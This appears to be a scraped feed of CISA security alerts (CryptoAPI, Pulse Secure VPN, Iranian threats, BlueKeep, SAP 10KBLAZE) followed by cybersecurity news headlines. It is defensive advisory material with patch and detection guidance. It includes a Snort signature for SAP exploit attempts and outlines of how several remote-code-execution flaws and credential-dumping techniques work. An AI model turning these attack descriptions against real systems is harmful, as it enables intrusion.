by CISA on 14 Gennaio 2020 at 5:46 pm
Original release date: January 14, 2020SummaryNew vulnerabilities are continually emerging, but the best defense against attackers exploiting patched vulnerabilities is simple: keep software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. On January 14, 2020, Microsoft released software fixes to address 49 vulnerabilities as part of their monthly Patch Tuesday announcement. Among the vulnerabilities patched were critical weaknesses in Windows CryptoAPI, Windows Remote Desktop Gateway (RD Gateway), and Windows Remote Desktop Client. An attacker could remotely exploit these vulnerabilities to decrypt, modify, or inject data on user connections: CryptoAPI spoofing vulnerability – CVE-2020-0601: This vulnerability affects all machines running 32- or 64-bit Windows 10 operating systems, including Windows Server versions 2016 and 2019. This vulnerability allows Elliptic Curve Cryptography (ECC) certificate validation to bypass the trust store, enabling unwanted or malicious software to masquerade as authentically signed by a trusted or trustworthy organization. This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection. Windows RD Gateway and Windows Remote Desktop Client vulnerabilities – CVE-2020-0609, CVE-2020-0610, and CVE-2020-0611: These vulnerabilities affect Windows Server 2012 and newer. In addition, CVE-2020-0611 affects Windows 7 and newer. These vulnerabilities—in the Windows Remote Desktop Client and RD Gateway Server—allow for remote code execution, where arbitrary code could be run freely. The server vulnerabilities do not require authentication or user interaction and can be exploited by a specially crafted request. The client vulnerability can be exploited by convincing a user to connect to a malicious server. The Cybersecurity and Infrastructure Security Agency (CISA) is unaware of active exploitation of these vulnerabilities. However, because patches have been publicly released, the underlying vulnerabilities can be reverse-engineered to create exploits that target unpatched systems. CISA strongly recommends organizations install these critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected information technology/operational technology (IT/OT) assets. Technical DetailsCryptoAPI Spoofing Vulnerability – CVE-2020-0601 A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates ECC certificates. According to Microsoft, “an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.” Additionally, “a successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.” A cyber attacker could exploit CVE-2020-0601 to obtain sensitive information, such as financial information, or run malware on a targeted system; for example: A maliciously crafted certificate could appear to be issued for a hostname that did not authorize it, preventing a browser that relies on Windows CryptoAPI from validating its authenticity and issuing warnings. If the certificate impersonates a user’s bank website, their financial information could be exposed. Signed malware can bypass protections (e.g., antivirus) that only run applications with valid signatures. Malicious files, emails, and executables can appear legitimate to unpatched users. The Microsoft Security Advisory for CVE-2020-0601 addresses this vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. Detection Measures The National Security Agency (NSA) provides detection measures for CVE-2020-0601 in their Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers. Windows RD Gateway Vulnerabilities – CVE-2020-0609/CVE-2020-0610 According to Microsoft, “A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction.”, CVE-2020-0609/CVE-2020-0610: Affects all supported Windows Server versions (Server 2012 and newer; support for Server 2008 ends January 14, 2020); Occurs pre-authentication; and Requires no user interaction to perform. The Microsoft Security Advisories for CVE-2020-0609 and CVE-2020-0610 address these vulnerabilities. Windows Remote Desktop Client Vulnerability – CVE-2020-0611 According to Microsoft, “A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client.” CVE-2020-0611 requires the user to connect to a malicious server via social engineering, Domain Name Server (DNS) poisoning, a man-in the-middle attack, or by the attacker compromising a legitimate server. The Microsoft Security Advisory for CVE-2020-0611 addresses this vulnerability. Impact A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include: Temporary or permanent loss of sensitive or proprietary information, Disruption to regular operations, Financial losses relating to restoring systems and files, and Potential harm to an organization’s reputation. MitigationsCISA strongly recommends organizations read the Microsoft January 2020 Release Notes page for more information and apply critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected IT/OT assets. General Guidance Review Guide to Enterprise Patch Management Technologies, NIST Special Publication 800-40 Revision 3. Patch management is the process for identifying, acquiring, installing, and verifying patches for products and systems. This publication is designed to assist organizations in understanding the basics of enterprise patch management technologies. It explains the importance of patch management and examines the challenges inherent in performing patch management. It provides an overview of enterprise patch management technologies, and also briefly discusses metrics for measuring the technologies’ effectiveness. Review CISA Insights publications. Informed by U.S. cyber intelligence and real-world events, each CISA Insight provides background information on particular cyber threats and the vulnerabilities they exploit, as well as a ready-made set of mitigation activities that non-federal partners can implement. Printable materials can be found by visiting: https://www.cisa.gov/publication/cisa-insights-publications. Review CISA’s Cyber Essentials. CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices. Essentials are the starting point to cyber readiness. To download the guide, visit: https://www.cisa.gov/publication/cisa-cyber-essentials. References  Microsoft Security Advisory for CVE-2020-0601  NSA Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers  Microsoft Security Advisory for CVE-2020-0609  Microsoft Security Advisory for CVE-2020-0610  Microsoft Security Advisory for CVE-2020-0611  CISA Blog: Windows Vulnerabilities that Require Immediate Attention  CERT/CC Vulnerability Note VU#849224  CERT/CC Vulnerability Note VU#491944 Revisions January 14, 2020: Initial version January 14, 2020: Minor technical edits This product is provided subject to this Notification and this Privacy & Use policy.
AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability
by CISA on 10 Gennaio 2020 at 11:45 am
Original release date: January 10, 2020SummaryUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerability, known as CVE-2019-11510, can become compromised in an attack.  Although Pulse Secure  disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510.    CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes.  Timelines of Specific Events April 24, 2019 – Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities. May 28, 2019 – Large commercial vendors get reports of vulnerable VPN through HackerOne. July 31, 2019 – Full RCE use of exploit demonstrated using the admin session hash to get complete shell. August 8, 2019 – Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation. August 24, 2019 – Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade. October 7, 2019 – The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors. October 16, 2019 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities. January 2020 – Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. Technical DetailsImpact A remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server. Affected versions: Pulse Connect Secure 9.0R1 - 9.0R3.3 Pulse Connect Secure 8.3R1 - 8.3R7 Pulse Connect Secure 8.2R1 - 8.2R12 Pulse Connect Secure 8.1R1 - 8.1R15 Pulse Policy Secure 9.0R1 - 9.0R3.1 Pulse Policy Secure 5.4R1 - 5.4R7 Pulse Policy Secure 5.3R1 - 5.3R12 Pulse Policy Secure 5.2R1 - 5.2R12 Pulse Policy Secure 5.1R1 - 5.1R15 MitigationsThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates. CISA strongly urges users and administrators to upgrade to the corresponding fixes.  References  NIST NVD CVE-2019-11510  Pulse Secure Advisory SA44101  CERT/CC Vulnerability Note VU#927237  CISA Current Activity Vulnerabilities in Multiple VPN Applications  CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN  Pulse Secure Advisory SA44101  Pulse Secure Advisory SA44101 Revisions January 10, 2020: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.
AA20-006A: Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad
by CISA on 6 Gennaio 2020 at 8:01 pm
Original release date: January 6, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is sharing the following information with the cybersecurity community as a primer for assisting in the protection of our Nation’s critical infrastructure in light of the current tensions between the Islamic Republic of Iran and the United States and Iran’s historic use of cyber offensive activities to retaliate against perceived harm. Foremost, CISA recommends organizations take the following actions: Adopt a state of heightened awareness. This includes minimizing coverage gaps in personnel availability, more consistently consuming relevant threat intelligence, and making sure emergency call trees are up to date. Increase organizational vigilance. Ensure security personnel are monitoring key internal security capabilities and that they know how to identify anomalous behavior. Flag any known Iranian indicators of compromise and tactics, techniques, and procedures (TTPs) for immediate response. Confirm reporting processes. Ensure personnel know how and when to report an incident. The well-being of an organization’s workforce and cyber infrastructure depends on awareness of threat activity. Consider reporting incidents to CISA to help serve as part of CISA’s early warning system (see Contact Information section below). Exercise organizational incident response plans. Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are your various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner. Technical DetailsIranian Cyber Threat Profile Iran has a history of leveraging asymmetric tactics to pursue national interests beyond its conventional capabilities. More recently, its use of offensive cyber operations is an extension of that doctrine. Iran has exercised its increasingly sophisticated capabilities to suppress both social and political perspectives deemed dangerous to Iran and to harm regional and international opponents. Iranian cyber threat actors have continuously improved their offensive cyber capabilities. They continue to engage in more “conventional” activities ranging from website defacement, distributed denial of service (DDoS) attacks, and theft of personally identifiable information (PII), but they have also demonstrated a willingness to push the boundaries of their activities, which include destructive wiper malware and, potentially, cyber-enabled kinetic attacks. The U.S. intelligence community and various private sector threat intelligence organizations have identified the Islamic Revolutionary Guard Corps (IRGC) as a driving force behind Iranian state-sponsored cyberattacks–either through contractors in the Iranian private sector or by the IRGC itself. Iranian Cyber Activity According to open-source information, offensive cyber operations targeting a variety of industries and organizations—including financial services, energy, government facilities, chemical, healthcare, critical manufacturing, communications, and the defense industrial base—have been attributed, or allegedly attributed, to the Iranian government. The same reporting has associated Iranian actors with a range of high-profile attacks, including the following: Late 2011 to Mid-2013 – DDoS Targeting U.S. Financial Sector: In response to this activity, in March 2016, the U.S. Department of Justice indicted seven Iranian actors employed by companies performing work on behalf of the IRGC for conducting DDoS attacks primarily targeting the public-facing websites of U.S. banks. The attacks prevented customers from accessing their accounts and cost the banks millions of dollars in remediation.  August/September 2013 – Unauthorized Access to Dam in New York State: In response, in March 2016, the U.S. Department of Justice indicted one Iranian actor employed by a company performing work on behalf of the IRGC for illegally accessing the supervisory control and data acquisition (SCADA) systems of the Bowman Dam in Rye, New York. The access allowed the actor to obtain information regarding the status and operation of the dam.  February 2014 – Sands Las Vegas Corporation Hacked: Cyber threat actors hacked into the Sands Las Vegas Corporation in Las Vegas, Nevada, and stole customer data, including credit card data, Social Security Numbers, and driver’s license numbers. According to a Bloomberg article from December 2014, the attack also involved a destructive portion, in which the Sands Las Vegas Corporation’s computer systems were wiped. In September 2015, the U.S. Director of National Intelligence identified the Iranian government as the perpetrator of the attack in a Statement for the Record to the House Permanent Select Committee on Intelligence.  2013 to 2017 – Cyber Theft Campaign on Behalf of IRGC: In response, in March 2018, the U.S. Justice Department indicted nine Iranian actors associated with the Mabna Institute for conducting a massive cyber theft campaign containing dozens of individual incidents, including “many on behalf of the IRGC.” The thefts targeted academic and intellectual property data as well as email account credentials. According to the indictment, the campaign targeted “144 U.S. universities, 176 universities across 21 foreign countries, 47 domestic and foreign private sector companies, the U.S. Department of Labor, the Federal Energy Regulatory Commission, the State of Hawaii, the State of Indiana, the United Nations, and the United Nations Children’s Fund.”  MitigationsRecommended Actions The following is a composite of actionable technical recommendations for IT professionals and providers to reduce their overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will likely have the highest return on investment. In general, CISA recommends two courses of action in the face of potential threat from Iranian actors: 1) vulnerability mitigation and 2) incident preparation. Disable all unnecessary ports and protocols. Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity. Enhance monitoring of network and email traffic. Review network signatures and indicators for focused operations activities, monitor for new phishing themes and adjust email rules accordingly, and follow best practices of restricting attachments via email or other mechanisms. Patch externally facing equipment. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial of service on externally facing equipment. Log and limit usage of PowerShell. Limit the usage of PowerShell to only users and accounts that need it, enable code signing of PowerShell scripts, and enable logging of all PowerShell commands. Ensure backups are up to date and stored in an easily retrievable location that is air-gapped from the organizational network. Patterns of Publicly Known Iranian Advanced Persistent Threats The following mitigations and detection recommendations regarding publicly known Iranian advanced persistent threat (APT) techniques are based on the MITRE ATT&CK Framework.  Iranian APT Technique Mitigation and Detection Credential Dumping Mitigation Manage the access control list for "Replicating Directory Changes" and other permissions associated with domain controller replication. Consider disabling or restricting NTLM. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts. Detection Windows: Monitor for unexpected processes interacting with Isass.exe. Linux: The AuditD monitoring tool can be used to watch for hostile processes opening a maps file in the proc file system, alerting on the pid, process name, and arguments for such programs. Obfuscated Files or Information Mitigation Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted. Detection Windows: Monitor for unexpected processes interacting with Isass.exe. Linux: The AuditD monitoring tool can be used to watch for hostile processes opening a maps file in the proc file system, alerting on the pid, process name, and arguments for such programs. Data Compressed Mitigation Network intrusion prevention or data loss prevention tools may be set to block specific file types from leaving the network over unencrypted channels. Detection Process monitoring and monitoring for command-line arguments for known compression utilities. If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. PowerShell Mitigation Set PowerShell execution policy to execute only signed scripts. Remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution. Restrict PowerShell execution policy to administrators. Detection If PowerShell is not used in an environment, looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System. Management.Automation.dll (especially to unusual process names/locations). Turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). User Execution Mitigation Application whitelisting may be able to prevent the running of executables masquerading as other files. If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr., .exe, .pif, .cpl, etc. Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Detection Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files that can be used to Deobfuscate/Decode Files or Information in payloads. Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting. Scripting Mitigation Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell. Detection Examine scripting user restrictions. Evaluate any attempts to enable scripts running on a system that would be considered suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Monitor processes and command-line arguments for script execution and subsequent behavior. Analyze Office file attachments for potentially malicious macros. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. Registry Run Keys/Startup Folder Mitigation This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Detection Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. Remote File Copy Mitigation Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Detection Monitor for file creation and files transferred within a network over SMB. Monitor use of utilities, such as FTP, that does not normally occur. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Spearphishing Link Mitigation Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Detection URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link. Spearphishing Attachment Mitigation Anti-virus can automatically quarantine suspicious files. Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in Obfuscated Files or Information. Users can be trained to identify social engineering techniques and spearphishing emails. Detection Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems. Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Contact InformationCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at 1-888-282-0870 (From outside the United States: +1-703-235-8832) CISAServiceDesk@cisa.dhs.gov (UNCLASS) email@example.com (SIPRNET) firstname.lastname@example.org (JWICS) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at http://www.us-cert.gov/. References  Department of Justice press release: Seven Iranians Working for Islamic Revolutionary Guard Corps-Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector  Department of Justice press release: Seven Iranians Working for Islamic Revolutionary Guard Corps-Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector  Bloomberg article: Now at the Sands Casino: An Iranian Hacker in Every Server  Department of Justice press release: Nine Iranians Charged With Conducting Massive Cyber Theft Campaign on Behalf of the Islamic Revolutionary Guard Corps  MITRE ATT&CK Framework CISA Insights: Increased Geopolitical Tensions and Threats Revisions January 6, 2019: Initial version This product is provided subject to this Notification and this Privacy & Use policy.
AA19-339A: Dridex Malware
by CISA on 5 Dicembre 2019 at 2:13 pm
AA19-290A: Microsoft Ending Support for Windows 7 and Windows Server 2008 R2
by CISA on 17 Ottobre 2019 at 4:36 pm
Original release date: October 17, 2019 | Last revised: October 18, 2019SummaryNote: This alert does not apply to federally certified voting systems running Windows 7. Microsoft will continue to provide free security updates to those systems through the 2020 election. See Microsoft’s article, Extending free Windows 7 security updates to voting systems, for more information. On January 14, 2020, Microsoft will end extended support for their Windows 7 and Windows Server 2008 R2 operating systems. After this date, these products will no longer receive free technical support, or software and security updates. Organizations that have regulatory obligations may find that they are unable to satisfy compliance requirements while running Windows 7 and Windows Server 2008 R2. Technical DetailsAll software products have a lifecycle. “End of support” refers to the date when the software vendor will no longer provide automatic fixes, updates, or online technical assistance.  For more information on end of support for Microsoft products see the Microsoft End of Support FAQ. Systems running Windows 7 and Windows Server 2008 R2 will continue to work at their current capacity even after support ends on January 14, 2020. However, using unsupported software may increase the likelihood of malware and other security threats. Mission and business functions supported by systems running Windows 7 and Windows Server 2008 R2 could experience negative consequences resulting from unpatched vulnerabilities and software bugs. These negative consequences could include the loss of confidentiality, integrity, and availability of data, system resources, and business assets. MitigationsThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and organizations to: Upgrade to a newer operating system. Identify affected devices to determine breadth of the problem and assess risk of not upgrading. Establish and execute a plan to systematically migrate to currently supported operating systems or employ a cloud-based service. Contact the operating system vendor to explore opportunities for fee-for-service maintenance, if unable to upgrade. References  Microsoft End of Support FAQ  Microsoft Windows Lifecyle Fact Sheet  Microsoft Windows Upgrade and Migration Considerations  ComputerWorld: Leaving Windows 7? Here are Some non-Windows Options  CISA Analysis Report AR19-133A: Microsoft Office 365 Security Observations Revisions October 17, 2019: Initial version October 18, 2019: Added note This product is provided subject to this Notification and this Privacy & Use policy.
AA19-168A: Microsoft Operating Systems BlueKeep Vulnerability
by CISA on 17 Giugno 2019 at 1:37 pm
Original release date: June 17, 2019SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this Activity Alert to provide information on a vulnerability, known as “BlueKeep,” that exists in the following Microsoft Windows Operating Systems (OSs), including both 32- and 64-bit versions, as well as all Service Pack versions:Windows 2000Windows VistaWindows XPWindows 7Windows Server 2003Windows Server 2003 R2Windows Server 2008Windows Server 2008 R2An attacker can exploit this vulnerability to take control of an affected system. Technical DetailsBlueKeep (CVE-2019-0708) exists within the Remote Desktop Protocol (RDP) used by the Microsoft Windows OSs listed above. An attacker can exploit this vulnerability to perform remote code execution on an unprotected system. According to Microsoft, an attacker can send specially crafted packets to one of these operating systems that has RDP enabled. After successfully sending the packets, the attacker would have the ability to perform a number of actions: adding accounts with full user rights; viewing, changing, or deleting data; or installing programs. This exploit, which requires no user interaction, must occur before authentication to be successful.BlueKeep is considered “wormable” because malware exploiting this vulnerability on a system could propagate to other vulnerable systems; thus, a BlueKeep exploit would be capable of rapidly spreading in a fashion similar to the WannaCry malware attacks of 2017.CISA has coordinated with external stakeholders and determined that Windows 2000 is vulnerable to BlueKeep.MitigationsCISA encourages users and administrators review the Microsoft Security Advisory  and the Microsoft Customer Guidance for CVE-2019-0708  and apply the appropriate mitigation measures as soon as possible:Install available patches. Microsoft has released security updates to patch this vulnerability. Microsoft has also released patches for a number of OSs that are no longer officially supported, including Windows Vista, Windows XP, and Windows Server 2003. As always, CISA encourages users and administrators to test patches before installation.For OSs that do not have patches or systems that cannot be patched, other mitigation steps can be used to help protect against BlueKeep:Upgrade end-of-life (EOL) OSs. Consider upgrading any EOL OSs no longer supported by Microsoft to a newer, supported OS, such as Windows 10.Disable unnecessary services. Disable services not being used by the OS. This best practice limits exposure to vulnerabilities. Enable Network Level Authentication. Enable Network Level Authentication in Windows 7, Windows Server 2008, and Windows Server 2008 R2. Doing so forces a session request to be authenticated and effectively mitigates against BlueKeep, as exploit of the vulnerability requires an unauthenticated session.Block Transmission Control Protocol (TCP) port 3389 at the enterprise perimeter firewall. Because port 3389 is used to initiate an RDP session, blocking it prevents an attacker from exploiting BlueKeep from outside the user’s network. However, this will block legitimate RDP sessions and may not prevent unauthenticated sessions from being initiated inside a network.References  Microsoft Security Advisory for CVE-2019-0708  White House Press Briefing on the Attribution of the WannaCry Malware Attack to North Korea  Microsoft Security Advisory for CVE-2019-0708  Microsoft Customer Guidance for CVE-2019-0708 Revisions June 17, 2019: Initial version June 17, 2019: Revised technical details section. This product is provided subject to this Notification and this Privacy & Use policy.
AA19-122A: New Exploits for Unsecure SAP Systems
by CISA on 2 Maggio 2019 at 10:54 pm
Original release date: May 2, 2019 | Last revised: May 3, 2019SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. Technical DetailsA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed “10KBLAZE.” The presentation details the new exploit tools and reports on systems exposed to the internet.SAP Gateway ACLThe SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands. According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.SAP Router secinfoThe SAP router is a program that helps connect SAP systems with external networks. The default secinfo configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker’s requests, which may result in remote code execution.According to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.SAP Message ServerSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the customer in all releases.SignatureCISA worked with security researchers from Onapsis Inc. to develop the following Snort signature that can be used to detect the exploits:alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"10KBLAZE SAP Exploit execute attempt"; flow:established,to_server; content:"|06 cb 03|"; offset:4; depth:3; content:"SAPXPG_START_XPG"; nocase; distance:0; fast_pattern; content:"37D581E3889AF16DA00A000C290099D0001"; nocase; distance:0; content:"extprog"; nocase; distance:0; sid:1; rev:1;) MitigationsCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:Ensure a secure configuration of their SAP landscape.Restrict access to SAP Message Server.Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways (gw/acl_mode and secinfo) and Message Servers (ms/acl_info)., Review SAP Note 1421005. Split MS internal/public: rdisp/msserv=0 rdisp/msserv_internal=39NN. Restrict access to Message Server internal port (tcp/39NN) to clients or the internet.Enable Secure Network Communications (SNC) for clients.Scan for exposed SAP components.Ensure that SAP components are not exposed to the internet.Remove or secure any exposed SAP components.References  Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials  SAP: Gateway Access Control Lists  Onapsis Inc. website  SAP Note 1408081  SAP Note 821875  SAP Note 1421005 Revisions May 2, 2019: Initial version This product is provided subject to this Notification and this Privacy & Use policy.
SMS Attack Spreads Emotet, Steals Bank Credentials
by Lindsey O'Donnell on 19 Febbraio 2020 at 4:00 pm
A new Emotet campaign is spread via SMS messages pretending to be from banks and may have ties to the TrickBot trojan.
Hamas Ensnares Israeli Soldiers with Pretty ‘Ladies’
by Tara Seals on 19 Febbraio 2020 at 3:52 pm
The third catfish attempt in three years from the Palestinian militant group adds a few technical advances to the mix.
Don't Let Iowa Bring Our Elections Back to the Stone Age
by Andre McGregor Chief Security Officer at ShiftState & Veteran FBI Agent on 19 Febbraio 2020 at 3:00 pm
The voting experience should be the same whether the vote is in person, by mail, or over the Internet. Let's not allow one bad incident stop us from finding new ways to achieve this.
Cynet Offers Free Threat Assessment for Mid-Sized and Large Organizations
by Pat Cooper on 19 Febbraio 2020 at 2:00 pm
Cynet Free Threat Assessment spotlights critical, exposed attack surfaces and provides actionable knowledge of attacks that are currently alive and active.
Latest Tax Scams Target Apps and Tax-Prep Websites
by Elizabeth Montalbano on 19 Febbraio 2020 at 12:03 pm
Traditional e-mail based scams are also in the mix this year, one in particular that uses the legitimate app TeamViewer to take over victims’ systems.
The Trouble with Free and Open Source Software
by Jai Vijayan Contributing Writer on 18 Febbraio 2020 at 11:40 pm
Insecure developer accounts, legacy software, and nonstandard naming schemes are major problems, Linux Foundation and Harvard study concludes.
FC Barcelona Suffers Likely Credential-Stuffing Attack on Twitter
by Tara Seals on 18 Febbraio 2020 at 10:18 pm
OurMine took over the Spanish powerhouse soccer team's Twitter account.
Dell Sells RSA to Private Equity Firm for $2.1B
by Kelly Jackson Higgins Executive Editor at Dark Reading on 18 Febbraio 2020 at 9:00 pm
Deal with private equity entity Symphony Technology Group revealed one week before the security industry's RSA Conference in San Francisco.
Ring Mandates 2FA After Rash of Hacks
by Lindsey O'Donnell on 18 Febbraio 2020 at 8:09 pm
Ring outlined new security and data privacy measures, Tuesday, following backlash of the connected doorbell in the past year.
Iran-Backed APTs Collaborate on 3-Year ‘Fox Kitten’ Global Spy Campaign
by Tara Seals on 18 Febbraio 2020 at 7:48 pm
APT34/OilRig and APT33/Elfin have established a highly developed and persistent infrastructure that could be converted to distribute destructive wiper malware.
Lumu to Emerge from Stealth at RSAC
by Dark Reading Staff on 18 Febbraio 2020 at 7:30 pm
The new company will focus on giving customers earlier indications of network and server compromise.
Cyber Fitness Takes More Than a Gym Membership & a Crash Diet
by Ryan Weeks Chief Information Security Officer at Datto on 18 Febbraio 2020 at 7:00 pm
Make cybersecurity your top priority, moving away from addressing individual problems with Band-Aids and toward attaining a long-term cyber-fitness plan.
Active Exploits Hit Vulnerable WordPress ThemeGrill Plugin
by Lindsey O'Donnell on 18 Febbraio 2020 at 5:27 pm
Websites using a vulnerable version of the WordPress plugin, ThemeGrill Demo Importer, are being targeted by attackers.
1.7M Nedbank Customers Affected via Third-Party Breach
by Dark Reading Staff on 18 Febbraio 2020 at 3:55 pm
A vulnerability in the network of marketing contractor Computer Facilities led to a breach at the South African bank.
